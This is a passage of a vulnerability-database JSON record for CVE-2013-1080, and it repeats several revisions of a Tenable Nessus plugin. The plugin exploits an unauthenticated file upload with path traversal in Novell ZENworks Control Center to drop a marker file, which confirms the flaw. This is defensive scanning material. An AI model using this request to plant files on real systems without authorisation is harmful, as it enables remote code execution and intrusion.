["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "66647e2799f052476dc65668cb2997b3c8b1c1073d6d1208fef6813eb21a0b87", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-11-17T03:15:20", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", 
"references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. 
Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' 
+ get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 7, "lastseen": "2018-11-17T03:15:20"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": 
["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2ede696d4e75976ffbbb3868703c353aa33436b0a911b1f0c1422f16aa3ff1e9", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "bd6d9651d6caedb9ea72ad4be4f2a1ef", "key": "references"}, {"hash": "cfeae2a362e44886f54cb768b1bf6a66", "key": "sourceData"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-08-30T19:56:52", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": 
["http://www.zerodayinitiative.com/advisories/ZDI-13-049/", "http://www.novell.com/support/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. 
Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.novell.com/support/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' 
+ get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:56:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": 
["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "966221f0f1690f7f8024b4af0452e7ad114615e21a819051b5422670f0b7bebf", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "bd6d9651d6caedb9ea72ad4be4f2a1ef", "key": "references"}, {"hash": "cfeae2a362e44886f54cb768b1bf6a66", "key": "sourceData"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-09-02T00:08:19", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", 
"references": ["http://www.zerodayinitiative.com/advisories/ZDI-13-049/", "http://www.novell.com/support/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. 
Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.novell.com/support/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' 
+ get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2018-09-02T00:08:19"}], "edition": 11, "hashmap": [{"key": 
"bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "068b77d157186fca8172f86db425ec10"}, {"key": "cvelist", "hash": "95a0a2a2e39f7412af46fcac0cebe0bf"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "e2b2244f868feb1714d67ab299c5131c"}, {"key": "href", "hash": "6a95d4214f12750e340ba0b31813bc2f"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "e6d6950356cc053768dc31379220b136"}, {"key": "published", "hash": "98da6d012ea545a1e6678fc9f410f0cd"}, {"key": "references", "hash": "5be30e03e787d644feaf8f202e413723"}, {"key": "reporter", "hash": "528cea5b87bf77107bd9f05291bbffe5"}, {"key": "sourceData", "hash": "de435e0277c005ba6f706cbc59d9eef7"}, {"key": "title", "hash": "1758aa7ce8ec03c7d8f476d27f7fc18f"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "c860ee60ff80f4193637b8b3245a244ddeccba1997fc19bc5e61b10eb5e911cd", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1080"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121042"]}, {"type": "saint", "idList": ["SAINT:94F8E6CAEFFA04E9B0850B791E66098C", "SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA"]}, {"type": "d2", "idList": ["D2SEC_ZCM2"]}, {"type": "zdi", "idList": ["ZDI-13-049"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"]}, {"type": "nessus", "idList": ["NOVELL_ZCC_RCE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:24938"]}, {"type": "dsquare", "idList": ["E-318"]}, {"type": "zdt", "idList": ["1337DAY-ID-20599"]}], "modified": "2019-11-01T03:00:24"}, "score": {"value": 8.3, "vector": "NONE", "modified": "2019-11-01T03:00:24"}, "vulnersScore": 8.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif 
(description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", 